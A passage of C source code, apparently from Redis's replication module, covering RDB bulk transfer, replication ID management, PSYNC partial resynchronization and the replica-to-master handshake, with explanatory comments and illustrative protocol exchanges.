                slave->replstate = SLAVE_STATE_ONLINE;
                slave->repl_put_online_on_ack = 1;
                slave->repl_ack_time = server.unixtime; /* Timeout otherwise. */
            } else {
                if (bgsaveerr != C_OK) {
                    freeClient(slave);
                    serverLog(LL_WARNING,"SYNC failed. BGSAVE child returned an error");
                    continue;
                }
                if ((slave->repldbfd = open(server.rdb_filename,O_RDONLY)) == -1 ||
                    redis_fstat(slave->repldbfd,&buf) == -1) {
                    freeClient(slave);
                    serverLog(LL_WARNING,"SYNC failed. Can't open/stat DB after BGSAVE: %s", strerror(errno));
                    continue;
                }
                slave->repldboff = 0;
                slave->repldbsize = buf.st_size;
                slave->replstate = SLAVE_STATE_SEND_BULK;
                slave->replpreamble = sdscatprintf(sdsempty(),"$%lld\r\n",
                    (unsigned long long) slave->repldbsize);

                aeDeleteFileEvent(server.el,slave->fd,AE_WRITABLE);
                if (aeCreateFileEvent(server.el, slave->fd, AE_WRITABLE, sendBulkToSlave, slave) == AE_ERR) {
                    freeClient(slave);
                    continue;
                }
            }
        }
    }
    if (startbgsave) startBgsaveForReplication(mincapa);
}

/* Change the current instance replication ID with a new, random one.
 * This will prevent successful PSYNCs between this master and other
 * slaves, so the command should be called when something happens that
 * alters the current history of the dataset. */
void changeReplicationId(void) {
    getRandomHexChars(server.replid,CONFIG_RUN_ID_SIZE);
    server.replid[CONFIG_RUN_ID_SIZE] = '\0';
}

/* Clear (invalidate) the secondary replication ID. This happens, for
 * example, after a full resynchronization, when we start a new replication
 * history. */
void clearReplicationId2(void) {
    memset(server.replid2,'0',sizeof(server.replid));
    server.replid2[CONFIG_RUN_ID_SIZE] = '\0';
    server.second_replid_offset = -1;
}

/* Use the current replication ID / offset as secondary replication
 * ID, and change the current one in order to start a new history.
 * This should be used when an instance is switched from slave to master
 * so that it can serve PSYNC requests performed using the master
 * replication ID. */
void shiftReplicationId(void) {
    memcpy(server.replid2,server.replid,sizeof(server.replid));
    /* We set the second replid offset to the master offset + 1, since
     * the slave will ask for the first byte it has not yet received, so
     * we need to add one to the offset: for example if, as a slave, we are
     * sure we have the same history as the master for 50 bytes, after we
     * are turned into a master, we can accept a PSYNC request with offset
     * 51, since the slave asking has the same history up to the 50th
     * byte, and is asking for the new bytes starting at offset 51. */
    server.second_replid_offset = server.master_repl_offset+1;
    changeReplicationId();
    serverLog(LL_WARNING,"Setting secondary replication ID to %s, valid up to offset: %lld. New replication ID is %s", server.replid2, server.second_replid_offset, server.replid);
}

/* ----------------------------------- SLAVE -------------------------------- */

/* Returns 1 if the given replication state is a handshake state,
 * 0 otherwise. */
int slaveIsInHandshakeState(void) {
    return server.repl_state >= REPL_STATE_RECEIVE_PONG &&
           server.repl_state <= REPL_STATE_RECEIVE_PSYNC;
}

/* Prevent the master from detecting that the slave is timing out while
 * loading the RDB file in initial synchronization. We send a single newline
 * character that is valid protocol but is guaranteed to either be sent
 * entirely or not at all, since the byte is indivisible.
 *
 * The function is called in two contexts: while we flush the current
 * data with emptyDb(), and while we load the new data received as an
 * RDB file from the master. */
void replicationSendNewlineToMaster(void) {
    static time_t newline_sent;
    if (time(NULL) != newline_sent) {
        newline_sent = time(NULL);
        if (write(server.repl_transfer_s,"\n",1) == -1) {
            /* Pinging back in this stage is best-effort. */
        }
    }
}

/* Callback used by emptyDb() while flushing away old data to load
 * the new dataset received by the master. */
void replicationEmptyDbCallback(void *privdata) {
    UNUSED(privdata);
    replicationSendNewlineToMaster();
}

/* Once we have a link with the master and the synchronization was
 * performed, this function materializes the master client we store
 * at server.master, starting from the specified file descriptor. */
void replicationCreateMasterClient(int fd, int dbid) {
    server.master = createClient(fd);
    server.master->flags |= CLIENT_MASTER;
    server.master->authenticated = 1;
    server.master->reploff = server.master_initial_offset;
    server.master->read_reploff = server.master->reploff;
    memcpy(server.master->replid, server.master_replid,
        sizeof(server.master_replid));
    /* If the master offset is set to -1, this master is old and is not
     * PSYNC capable, so we flag it accordingly. */
    if (server.master->reploff == -1)
        server.master->flags |= CLIENT_PRE_PSYNC;
    if (dbid != -1) selectDb(server.master,dbid);
}

void restartAOF() {
    int retry = 10;
    while (retry-- && startAppendOnly() == C_ERR) {
        serverLog(LL_WARNING,"Failed enabling the AOF after successful master synchronization! Trying it again in one second.");
        sleep(1);
    }
    if (!retry) {
        serverLog(LL_WARNING,"FATAL: this slave instance finished the synchronization with its master, but the AOF can't be turned on. Exiting now.");
        exit(1);
    }
}

/* Asynchronously read the SYNC payload we receive from a master */
#define REPL_MAX_WRITTEN_BEFORE_FSYNC (1024*1024*8) /* 8 MB */
void readSyncBulkPayload(aeEventLoop *el, int fd, void *privdata, int mask) {
    char buf[4096];
    ssize_t nread, readlen;
    off_t left;
    UNUSED(el);
    UNUSED(privdata);
    UNUSED(mask);

    /* Static vars used to hold the EOF mark, and the last bytes received
     * from the server: when they match, we reached the end of the transfer. */
    static char eofmark[CONFIG_RUN_ID_SIZE];
    static char lastbytes[CONFIG_RUN_ID_SIZE];
    static int usemark = 0;

    /* If repl_transfer_size == -1 we still have to read the bulk length
     * from the master reply. */
    if (server.repl_transfer_size == -1) {
        if (syncReadLine(fd,buf,1024,server.repl_syncio_timeout*1000) == -1) {
            serverLog(LL_WARNING,
                "I/O error reading bulk count from MASTER: %s",
                strerror(errno));
            goto error;
        }

        if (buf[0] == '-') {
            serverLog(LL_WARNING,
                "MASTER aborted replication with an error: %s",
                buf+1);
            goto error;
        } else if (buf[0] == '\0') {
            /* At this stage just a newline works as a PING in order to take
             * the connection live.
             * So we refresh our last interaction timestamp. */
            server.repl_transfer_lastio = server.unixtime;
            return;
        } else if (buf[0] != '$') {
            serverLog(LL_WARNING,"Bad protocol from MASTER, the first byte is not '$' (we received '%s'), are you sure the host and port are right?", buf);
            goto error;
        }

        /* There are two possible forms for the bulk payload. One is the
         * usual $<count> bulk format. The other is used for diskless transfers
         * when the master does not know beforehand the size of the file to
         * transfer. In the latter case, the following format is used:
         *
         * $EOF:<40 bytes delimiter>
         *
         * At the end of the file the announced delimiter is transmitted. The
         * delimiter is long and random enough that the probability of a
         * collision with the actual file content can be ignored. */
        if (strncmp(buf+1,"EOF:",4) == 0 && strlen(buf+5) >= CONFIG_RUN_ID_SIZE) {
            usemark = 1;
            memcpy(eofmark,buf+5,CONFIG_RUN_ID_SIZE);
            memset(lastbytes,0,CONFIG_RUN_ID_SIZE);
            /* Set repl_transfer_size to a non -1 value to avoid entering
             * this code path again at the next call. */
            server.repl_transfer_size = 0;
            serverLog(LL_NOTICE,
                "MASTER <-> SLAVE sync: receiving streamed RDB from master");
        } else {
            usemark = 0;
            server.repl_transfer_size = strtol(buf+1,NULL,10);
            serverLog(LL_NOTICE,
                "MASTER <-> SLAVE sync: receiving %lld bytes from master",
                (long long) server.repl_transfer_size);
        }
        return;
    }

    /* Read bulk data */
    if (usemark) {
        readlen = sizeof(buf);
    } else {
        left = server.repl_transfer_size - server.repl_transfer_read;
        readlen = (left < (signed)sizeof(buf)) ? left : (signed)sizeof(buf);
    }

    nread = read(fd,buf,readlen);
    if (nread <= 0) {
        serverLog(LL_WARNING,"I/O error trying to sync with MASTER: %s",
            (nread == -1) ? strerror(errno) : "connection lost");
        cancelReplicationHandshake();
        return;
    }
    server.stat_net_input_bytes += nread;

    /* When a mark is used, we want to detect EOF ASAP in order to avoid
     * writing the EOF mark into the file... */
    int eof_reached = 0;

    if (usemark) {
        /* Update the last bytes array, and check if it matches our
         * delimiter. */
        if (nread >= CONFIG_RUN_ID_SIZE) {
            memcpy(lastbytes,buf+nread-CONFIG_RUN_ID_SIZE,CONFIG_RUN_ID_SIZE);
        } else {
            int rem = CONFIG_RUN_ID_SIZE-nread;
            memmove(lastbytes,lastbytes+nread,rem);
            memcpy(lastbytes+rem,buf,nread);
        }
        if (memcmp(lastbytes,eofmark,CONFIG_RUN_ID_SIZE) == 0) eof_reached = 1;
    }

    server.repl_transfer_lastio = server.unixtime;
    if (write(server.repl_transfer_fd,buf,nread) != nread) {
        serverLog(LL_WARNING,"Write error or short write writing to the DB dump file needed for MASTER <-> SLAVE synchronization: %s", strerror(errno));
        goto error;
    }
    server.repl_transfer_read += nread;

    /* Delete the last 40 bytes from the file if we reached EOF. */
    if (usemark && eof_reached) {
        if (ftruncate(server.repl_transfer_fd,
            server.repl_transfer_read - CONFIG_RUN_ID_SIZE) == -1)
        {
            serverLog(LL_WARNING,"Error truncating the RDB file received from the master for SYNC: %s", strerror(errno));
            goto error;
        }
    }

    /* Sync data on disk from time to time, otherwise at the end of the
     * transfer we may suffer a big delay as the memory buffers are copied
     * into the actual disk.
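     *
     * As a worked example (numbers illustrative): with
     * REPL_MAX_WRITTEN_BEFORE_FSYNC at 8 MB, once repl_transfer_read grows
     * at least 8 MB past repl_transfer_last_fsync_off, the check below calls
     * rdb_fsync_range() on exactly the accumulated window and then advances
     * repl_transfer_last_fsync_off, so every byte is fsync'ed only once.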
     */
    if (server.repl_transfer_read >=
        server.repl_transfer_last_fsync_off + REPL_MAX_WRITTEN_BEFORE_FSYNC)
    {
        off_t sync_size = server.repl_transfer_read -
                          server.repl_transfer_last_fsync_off;
        rdb_fsync_range(server.repl_transfer_fd,
            server.repl_transfer_last_fsync_off, sync_size);
        server.repl_transfer_last_fsync_off += sync_size;
    }

    /* Check if the transfer is now complete */
    if (!usemark) {
        if (server.repl_transfer_read == server.repl_transfer_size)
            eof_reached = 1;
    }

    if (eof_reached) {
        int aof_is_enabled = server.aof_state != AOF_OFF;

        if (rename(server.repl_transfer_tmpfile,server.rdb_filename) == -1) {
            serverLog(LL_WARNING,"Failed trying to rename the temp DB into dump.rdb in MASTER <-> SLAVE synchronization: %s", strerror(errno));
            cancelReplicationHandshake();
            return;
        }
        serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: Flushing old data");
        /* We need to stop any AOF rewrite child before flushing and parsing
         * the RDB, otherwise we'll create a copy-on-write disaster. */
        if (aof_is_enabled) stopAppendOnly();
        signalFlushedDb(-1);
        emptyDb(-1,
            server.repl_slave_lazy_flush ? EMPTYDB_ASYNC : EMPTYDB_NO_FLAGS,
            replicationEmptyDbCallback);

        /* Before loading the DB into memory we need to delete the readable
         * handler, otherwise it will get called recursively since
         * rdbLoad() will call the event loop to process events from time to
         * time for non blocking loading. */
        aeDeleteFileEvent(server.el,server.repl_transfer_s,AE_READABLE);
        serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: Loading DB in memory");
        rdbSaveInfo rsi = RDB_SAVE_INFO_INIT;
        if (rdbLoad(server.rdb_filename,&rsi) != C_OK) {
            serverLog(LL_WARNING,"Failed trying to load the MASTER synchronization DB from disk");
            cancelReplicationHandshake();
            /* Re-enable the AOF if we disabled it earlier, in order to
             * restore the original configuration. */
            if (aof_is_enabled) restartAOF();
            return;
        }
        /* Final setup of the connected slave <- master link */
        zfree(server.repl_transfer_tmpfile);
        close(server.repl_transfer_fd);
        replicationCreateMasterClient(server.repl_transfer_s,rsi.repl_stream_db);
        server.repl_state = REPL_STATE_CONNECTED;
        /* After a full resynchronization we use the replication ID and
         * offset of the master. The secondary ID / offset are cleared since
         * we are starting a new history. */
        memcpy(server.replid,server.master->replid,sizeof(server.replid));
        server.master_repl_offset = server.master->reploff;
        clearReplicationId2();
        /* Let's create the replication backlog if needed. Slaves need to
         * accumulate the backlog regardless of the fact they have sub-slaves
         * or not, in order to behave correctly if they are promoted to
         * masters after a failover. */
        if (server.repl_backlog == NULL) createReplicationBacklog();

        serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: Finished with success");
        /* Restart the AOF subsystem now that we finished the sync. This
         * will trigger an AOF rewrite, and when done will start appending
         * to the new file. */
        if (aof_is_enabled) restartAOF();
    }
    return;

error:
    cancelReplicationHandshake();
    return;
}

/* Send a synchronous command to the master. Used to send AUTH and
 * REPLCONF commands before starting the replication with SYNC.
 *
 * The command returns an sds string representing the result of the
 * operation. On error the first byte is a "-". */
#define SYNC_CMD_READ (1<<0)
#define SYNC_CMD_WRITE (1<<1)
#define SYNC_CMD_FULL (SYNC_CMD_READ|SYNC_CMD_WRITE)
char *sendSynchronousCommand(int flags, int fd, ...) {

    /* Create the command to send to the master. We use the simple inline
     * protocol for simplicity, as currently we only send simple strings.
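     *
     * For example (hypothetical arguments), the call:
     *
     *   sendSynchronousCommand(SYNC_CMD_WRITE,fd,"REPLCONF",
     *                          "listening-port","6380",NULL);
     *
     * writes the single inline line "REPLCONF listening-port 6380\r\n"
     * to the master socket.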
     */
    if (flags & SYNC_CMD_WRITE) {
        char *arg;
        va_list ap;
        sds cmd = sdsempty();
        va_start(ap,fd);

        while(1) {
            arg = va_arg(ap, char*);
            if (arg == NULL) break;

            if (sdslen(cmd) != 0) cmd = sdscatlen(cmd," ",1);
            cmd = sdscat(cmd,arg);
        }
        cmd = sdscatlen(cmd,"\r\n",2);

        /* Transfer command to the server. */
        if (syncWrite(fd,cmd,sdslen(cmd),server.repl_syncio_timeout*1000)
            == -1)
        {
            sdsfree(cmd);
            return sdscatprintf(sdsempty(),"-Writing to master: %s",
                    strerror(errno));
        }
        sdsfree(cmd);
        va_end(ap);
    }

    /* Read the reply from the server. */
    if (flags & SYNC_CMD_READ) {
        char buf[256];

        if (syncReadLine(fd,buf,sizeof(buf),server.repl_syncio_timeout*1000)
            == -1)
        {
            return sdscatprintf(sdsempty(),"-Reading from master: %s",
                    strerror(errno));
        }
        server.repl_transfer_lastio = server.unixtime;
        return sdsnew(buf);
    }
    return NULL;
}

/* Try a partial resynchronization with the master if we are about to
 * reconnect. If there is no cached master structure, at least try to issue a
 * "PSYNC ? -1" command in order to trigger a full resync using the PSYNC
 * command, so as to obtain the master replication ID and the master
 * replication global offset.
 *
 * This function is designed to be called from syncWithMaster(), so the
 * following assumptions are made:
 *
 * 1) We pass the function an already connected socket "fd".
 * 2) This function does not close the file descriptor "fd". However in case
 *    of successful partial resynchronization, the function will reuse
 *    'fd' as file descriptor of the server.master client structure.
 *
 * The function is split in two halves: if read_reply is 0, the function
 * writes the PSYNC command on the socket, and a new function call is
 * needed, with read_reply set to 1, in order to read the reply of the
 * command. This is useful in order to support non blocking operations, so
 * that we write, return into the event loop, and read when there are data.
 *
 * When read_reply is 0 the function returns PSYNC_WRITE_ERROR if there
 * was a write error, or PSYNC_WAIT_REPLY to signal we need another call
 * with read_reply set to 1. However even when read_reply is set to 1
 * the function may return PSYNC_WAIT_REPLY again to signal there were
 * insufficient data to read to complete its work. We should re-enter
 * into the event loop and wait in such a case.
 *
 * The function returns:
 *
 * PSYNC_CONTINUE: If the PSYNC command succeeded and we can continue.
 * PSYNC_FULLRESYNC: If PSYNC is supported but a full resync is needed.
 *                   In this case the master replid and global replication
 *                   offset is saved.
 * PSYNC_NOT_SUPPORTED: If the server does not understand PSYNC at all and
 *                      the caller should fall back to SYNC.
 * PSYNC_WRITE_ERROR: There was an error writing the command to the socket.
 * PSYNC_WAIT_REPLY: Call again the function with read_reply set to 1.
 * PSYNC_TRY_LATER: Master is currently in a transient error condition.
 *
 * Notable side effects:
 *
 * 1) As a side effect of the function call the function removes the readable
 *    event handler from "fd", unless the return value is PSYNC_WAIT_REPLY.
 * 2) server.master_initial_offset is set to the right value according
 *    to the master reply. This will be used to populate the 'server.master'
 *    structure replication offset.
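 *
 * An illustrative wire exchange (replication IDs shortened and offsets
 * invented for the example):
 *
 *   Slave:  PSYNC 2a78b5e3...cd 1601
 *   Master: +CONTINUE 2a78b5e3...cd          (partial resync accepted)
 *
 *   Slave:  PSYNC ? -1
 *   Master: +FULLRESYNC 2a78b5e3...cd 1600   (full resync is needed)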
 */
#define PSYNC_WRITE_ERROR 0
#define PSYNC_WAIT_REPLY 1
#define PSYNC_CONTINUE 2
#define PSYNC_FULLRESYNC 3
#define PSYNC_NOT_SUPPORTED 4
#define PSYNC_TRY_LATER 5
int slaveTryPartialResynchronization(int fd, int read_reply) {
    char *psync_replid;
    char psync_offset[32];
    sds reply;

    /* Writing half */
    if (!read_reply) {
        /* Initially set master_initial_offset to -1 to mark the current
         * master replid and offset as not valid. Later if we'll be able to do
         * a FULL resync using the PSYNC command we'll set the offset at the
         * right value, so that this information will be propagated to the
         * client structure representing the master into server.master. */
        server.master_initial_offset = -1;

        if (server.cached_master) {
            psync_replid = server.cached_master->replid;
            snprintf(psync_offset,sizeof(psync_offset),"%lld",
                server.cached_master->reploff+1);
            serverLog(LL_NOTICE,"Trying a partial resynchronization (request %s:%s).", psync_replid, psync_offset);
        } else {
            serverLog(LL_NOTICE,"Partial resynchronization not possible (no cached master)");
            psync_replid = "?";
            memcpy(psync_offset,"-1",3);
        }

        /* Issue the PSYNC command */
        reply = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"PSYNC",psync_replid,psync_offset,NULL);
        if (reply != NULL) {
            serverLog(LL_WARNING,"Unable to send PSYNC to master: %s",reply);
            sdsfree(reply);
            aeDeleteFileEvent(server.el,fd,AE_READABLE);
            return PSYNC_WRITE_ERROR;
        }
        return PSYNC_WAIT_REPLY;
    }

    /* Reading half */
    reply = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL);
    if (sdslen(reply) == 0) {
        /* The master may send empty newlines after it receives PSYNC
         * and before replying, just to keep the connection alive. */
        sdsfree(reply);
        return PSYNC_WAIT_REPLY;
    }

    aeDeleteFileEvent(server.el,fd,AE_READABLE);

    if (!strncmp(reply,"+FULLRESYNC",11)) {
        char *replid = NULL, *offset = NULL;

        /* FULL RESYNC, parse the reply in order to extract the replid
         * and the replication offset. */
        replid = strchr(reply,' ');
        if (replid) {
            replid++;
            offset = strchr(replid,' ');
            if (offset) offset++;
        }
        if (!replid || !offset || (offset-replid-1) != CONFIG_RUN_ID_SIZE) {
            serverLog(LL_WARNING,
                "Master replied with wrong +FULLRESYNC syntax.");
            /* This is an unexpected condition, actually the +FULLRESYNC
             * reply means that the master supports PSYNC, but the reply
             * format seems wrong. To stay safe we blank the master
             * replid to make sure next PSYNCs will fail. */
            memset(server.master_replid,0,CONFIG_RUN_ID_SIZE+1);
        } else {
            memcpy(server.master_replid, replid, offset-replid-1);
            server.master_replid[CONFIG_RUN_ID_SIZE] = '\0';
            server.master_initial_offset = strtoll(offset,NULL,10);
            serverLog(LL_NOTICE,"Full resync from master: %s:%lld",
                server.master_replid,
                server.master_initial_offset);
        }
        /* We are going to full resync, discard the cached master structure. */
        replicationDiscardCachedMaster();
        sdsfree(reply);
        return PSYNC_FULLRESYNC;
    }

    if (!strncmp(reply,"+CONTINUE",9)) {
        /* Partial resync was accepted. */
        serverLog(LL_NOTICE,
            "Successful partial resynchronization with master.");

        /* Check the new replication ID advertised by the master. If it
         * changed, we need to set the new ID as our primary ID, and set
         * our secondary ID as the old master ID up to the current offset,
         * so that our sub-slaves will be able to PSYNC with us after a
         * disconnection.
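         *
         * For instance (illustrative reply), given
         * "+CONTINUE 3f0c42...9a\r\n" the code below points 'start' just
         * past the space and scans 'end' up to the line terminator: exactly
         * CONFIG_RUN_ID_SIZE bytes in between means the master advertised
         * a (possibly new) replication ID.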
         */
        char *start = reply+10;
        char *end = reply+9;
        while(end[0] != '\r' && end[0] != '\n' && end[0] != '\0') end++;
        if (end-start == CONFIG_RUN_ID_SIZE) {
            char new[CONFIG_RUN_ID_SIZE+1];
            memcpy(new,start,CONFIG_RUN_ID_SIZE);
            new[CONFIG_RUN_ID_SIZE] = '\0';

            if (strcmp(new,server.cached_master->replid)) {
                /* Master ID changed. */
                serverLog(LL_WARNING,"Master replication ID changed to %s",new);

                /* Set the old ID as our ID2, up to the current offset+1. */
                memcpy(server.replid2,server.cached_master->replid,
                    sizeof(server.replid2));
                server.second_replid_offset = server.master_repl_offset+1;

                /* Update the cached master ID and our own primary ID to the
                 * new one. */
                memcpy(server.replid,new,sizeof(server.replid));
                memcpy(server.cached_master->replid,new,sizeof(server.replid));

                /* Disconnect all the sub-slaves: they need to be notified. */
                disconnectSlaves();
            }
        }

        /* Setup the replication to continue. */
        sdsfree(reply);
        replicationResurrectCachedMaster(fd);

        /* If this instance was restarted and we read the metadata to
         * PSYNC from the persistence file, our replication backlog could
         * still be uninitialized. Create it. */
        if (server.repl_backlog == NULL) createReplicationBacklog();
        return PSYNC_CONTINUE;
    }

    /* If we reach this point we received either an error (since the master
     * does not understand PSYNC or because it is in a special state and
     * cannot serve our request), or an unexpected reply from the master.
     *
     * Return PSYNC_NOT_SUPPORTED on errors we don't understand, otherwise
     * return PSYNC_TRY_LATER if we believe this is a transient error. */

    if (!strncmp(reply,"-NOMASTERLINK",13) ||
        !strncmp(reply,"-LOADING",8))
    {
        serverLog(LL_NOTICE,
            "Master is currently unable to PSYNC "
            "but should be in the future: %s", reply);
        sdsfree(reply);
        return PSYNC_TRY_LATER;
    }

    if (strncmp(reply,"-ERR",4)) {
        /* If it's not an error, log the unexpected event. */
        serverLog(LL_WARNING,
            "Unexpected reply to PSYNC from master: %s", reply);
    } else {
        serverLog(LL_NOTICE,
            "Master does not support PSYNC or is in "
            "error state (reply: %s)", reply);
    }
    sdsfree(reply);
    replicationDiscardCachedMaster();
    return PSYNC_NOT_SUPPORTED;
}

/* This handler fires when the non blocking connect was able to
 * establish a connection with the master. */
void syncWithMaster(aeEventLoop *el, int fd, void *privdata, int mask) {
    char tmpfile[256], *err = NULL;
    int dfd = -1, maxtries = 5;
    int sockerr = 0, psync_result;
    socklen_t errlen = sizeof(sockerr);
    UNUSED(el);
    UNUSED(privdata);
    UNUSED(mask);

    /* If this event fired after the user turned the instance into a master
     * with SLAVEOF NO ONE we must just return ASAP. */
    if (server.repl_state == REPL_STATE_NONE) {
        close(fd);
        return;
    }

    /* Check for errors in the socket: after a non blocking connect() we
     * may find that the socket is in error state. */
    if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &sockerr, &errlen) == -1)
        sockerr = errno;
    if (sockerr) {
        serverLog(LL_WARNING,"Error condition on socket for SYNC: %s",
            strerror(sockerr));
        goto error;
    }

    /* Send a PING to check if the master is able to reply without errors. */
    if (server.repl_state == REPL_STATE_CONNECTING) {
        serverLog(LL_NOTICE,"Non blocking connect for SYNC fired the event.");
        /* Delete the writable event so that the readable event remains
         * registered and we can wait for the PONG reply. */
        aeDeleteFileEvent(server.el,fd,AE_WRITABLE);
        server.repl_state = REPL_STATE_RECEIVE_PONG;
        /* Send the PING, don't check for errors at all, we have the timeout
         * that will take care of this.
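         *
         * (The expected exchange is simply "PING\r\n" answered by "+PONG",
         * but an authentication error reply is tolerated as well; see the
         * RECEIVE_PONG state below.)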
         */
        err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"PING",NULL);
        if (err) goto write_error;
        return;
    }

    /* Receive the PONG command. */
    if (server.repl_state == REPL_STATE_RECEIVE_PONG) {
        err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL);

        /* We accept only two replies as valid, a positive +PONG reply
         * (we just check for "+") or an authentication error.
         * Note that older versions of Redis replied with "operation not
         * permitted" instead of using a proper error code, so we test
         * both. */
        if (err[0] != '+' &&
            strncmp(err,"-NOAUTH",7) != 0 &&
            strncmp(err,"-ERR operation not permitted",28) != 0)
        {
            serverLog(LL_WARNING,"Error reply to PING from master: '%s'",err);
            sdsfree(err);
            goto error;
        } else {
            serverLog(LL_NOTICE,
                "Master replied to PING, replication can continue...");
        }
        sdsfree(err);
        server.repl_state = REPL_STATE_SEND_AUTH;
    }

    /* AUTH with the master if required. */
    if (server.repl_state == REPL_STATE_SEND_AUTH) {
        if (server.masterauth) {
            err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"AUTH",server.masterauth,NULL);
            if (err) goto write_error;
            server.repl_state = REPL_STATE_RECEIVE_AUTH;
            return;
        } else {
            server.repl_state = REPL_STATE_SEND_PORT;
        }
    }

    /* Receive AUTH reply. */
    if (server.repl_state == REPL_STATE_RECEIVE_AUTH) {
        err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL);
        if (err[0] == '-') {
            serverLog(LL_WARNING,"Unable to AUTH to MASTER: %s",err);
            sdsfree(err);
            goto error;
        }
        sdsfree(err);
        server.repl_state = REPL_STATE_SEND_PORT;
    }

    /* Set the slave port, so that the master's INFO command can list the
     * slave listening port correctly. */
    if (server.repl_state == REPL_STATE_SEND_PORT) {
        sds port = sdsfromlonglong(server.slave_announce_port ?
            server.slave_announce_port : server.port);
        err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"REPLCONF",
                "listening-port",port, NULL);
        sdsfree(port);
        if (err) goto write_error;
        sdsfree(err);
        server.repl_state = REPL_STATE_RECEIVE_PORT;
        return;
    }

    /* Receive REPLCONF listening-port reply. */
    if (server.repl_state == REPL_STATE_RECEIVE_PORT) {
        err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL);
        /* Ignore the error if any, not all the Redis versions support
         * REPLCONF listening-port. */
        if (err[0] == '-') {
            serverLog(LL_NOTICE,"(Non critical) Master does not understand "
                                "REPLCONF listening-port: %s", err);
        }
        sdsfree(err);
        server.repl_state = REPL_STATE_SEND_IP;
    }

    /* Skip REPLCONF ip-address if there is no slave-announce-ip option set. */
    if (server.repl_state == REPL_STATE_SEND_IP &&
        server.slave_announce_ip == NULL)
    {
        server.repl_state = REPL_STATE_SEND_CAPA;
    }

    /* Set the slave ip, so that the master's INFO command can list the
     * slave IP address correctly in case of port forwarding or NAT. */
    if (server.repl_state == REPL_STATE_SEND_IP) {
        err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"REPLCONF",
                "ip-address",server.slave_announce_ip, NULL);
        if (err) goto write_error;
        sdsfree(err);
        server.repl_state = REPL_STATE_RECEIVE_IP;
        return;
    }

    /* Receive REPLCONF ip-address reply. */
    if (server.repl_state == REPL_STATE_RECEIVE_IP) {
        err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL);
        /* Ignore the error if any, not all the Redis versions support
         * REPLCONF ip-address. */
        if (err[0] == '-') {
            serverLog(LL_NOTICE,"(Non critical) Master does not understand "
                                "REPLCONF ip-address: %s", err);
        }
        sdsfree(err);
        server.repl_state = REPL_STATE_SEND_CAPA;
    }

    /* Inform the master of our (slave) capabilities.
     *
     * EOF: supports EOF-style RDB transfer for diskless replication.
     * PSYNC2: supports PSYNC v2, so understands +CONTINUE <new repl ID>.
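     *
     * (Concretely, the command sent below is: "REPLCONF capa eof capa psync2".)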
     *
     * The master will ignore capabilities it does not understand. */
    if (server.repl_state == REPL_STATE_SEND_CAPA) {
        err = sendSynchronousCommand(SYNC_CMD_WRITE,fd,"REPLCONF",
                "capa","eof","capa","psync2",NULL);
        if (err) goto write_error;
        sdsfree(err);
        server.repl_state = REPL_STATE_RECEIVE_CAPA;
        return;
    }

    /* Receive CAPA reply. */
    if (server.repl_state == REPL_STATE_RECEIVE_CAPA) {
        err = sendSynchronousCommand(SYNC_CMD_READ,fd,NULL);
        /* Ignore the error if any, not all the Redis versions support
         * REPLCONF capa. */
        if (err[0] == '-') {
            serverLog(LL_NOTICE,"(Non critical) Master does not understand "
                                "REPLCONF capa: %s", err);
        }
        sdsfree(err);
        server.repl_state = REPL_STATE_SEND_PSYNC;
    }

    /* Try a partial resynchronization. If we don't have a cached master
     * slaveTryPartialResynchronization() will at least try to use PSYNC
     * to start a full resynchronization so that we get the master replid
     * and the global offset, to try a partial resync at the next
     * reconnection attempt. */
    if (server.repl_state == REPL_STATE_SEND_PSYNC) {
        if (slaveTryPartialResynchronization(fd,0) == PSYNC_WRITE_ERROR) {
            err = sdsnew("Write error sending the PSYNC command.");
            goto write_error;
        }
        server.repl_state = REPL_STATE_RECEIVE_PSYNC;
        return;
    }

    /* If we reached this point, we should be in REPL_STATE_RECEIVE_PSYNC. */
    if (server.repl_state != REPL_STATE_RECEIVE_PSYNC) {
        serverLog(LL_WARNING,"syncWithMaster(): state machine error, "
                             "state should be RECEIVE_PSYNC but is %d",
                             server.repl_state);
        goto error;
    }

    psync_result = slaveTryPartialResynchronization(fd,1);
    if (psync_result == PSYNC_WAIT_REPLY) return; /* Try again later... */

    /* If the master is in a transient error, we should try to PSYNC
     * from scratch later, so go to the error path. This happens when
     * the server is loading the dataset or is not connected with its
     * master and so forth. */
    if (psync_result == PSYNC_TRY_LATER) goto error;

    /* Note: if PSYNC does not return WAIT_REPLY, it will take care of
     * uninstalling the read handler from the file descriptor. */

    if (psync_result == PSYNC_CONTINUE) {
        serverLog(LL_NOTICE, "MASTER <-> SLAVE sync: Master accepted a Partial Resynchronization.");
        return;
    }

    /* PSYNC failed or is not supported: we want our slaves to resync with us
     * as well, if we have any sub-slaves. The master may transfer us an
     * entirely different data set and we have no way to incrementally feed
     * our slaves after that. */
    disconnectSlaves(); /* Force our slaves to resync with us as well. */
    freeReplicationBacklog(); /* Don't allow our chained slaves to PSYNC. */

    /* Fall back to SYNC if needed. Otherwise psync_result == PSYNC_FULLRESYNC
     * and the server.master_replid and master_initial_offset are
     * already populated. */
    if (psync_result == PSYNC_NOT_SUPPORTED) {
        serverLog(LL_NOTICE,"Retrying with SYNC...");
        if (syncWrite(fd,"SYNC\r\n",6,server.repl_syncio_timeout*1000) == -1) {
            serverLog(LL_WARNING,"I/O error writing to MASTER: %s",
                strerror(errno));
            goto error;
        }
    }

    /* Prepare a suitable temp file for bulk transfer */
    while(maxtries--) {
        snprintf(tmpfile,256,
            "temp-%d.%ld.rdb",(int)server.unixtime,(long int)getpid());
        dfd = open(tmpfile,O_CREAT|O_WRONLY|O_EXCL,0644);
        if (dfd != -1) break;
        sleep(1);
    }
    if (dfd == -1) {
        serverLog(LL_WARNING,"Opening the temp file needed for MASTER <-> SLAVE synchronization: %s",strerror(errno));
        goto error;
    }

    /* Setup the non blocking download of the bulk file.
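     *
     * (The temp file created above is named after the unix time and the pid,
     * e.g. "temp-1507801234.4132.rdb", numbers purely illustrative. The
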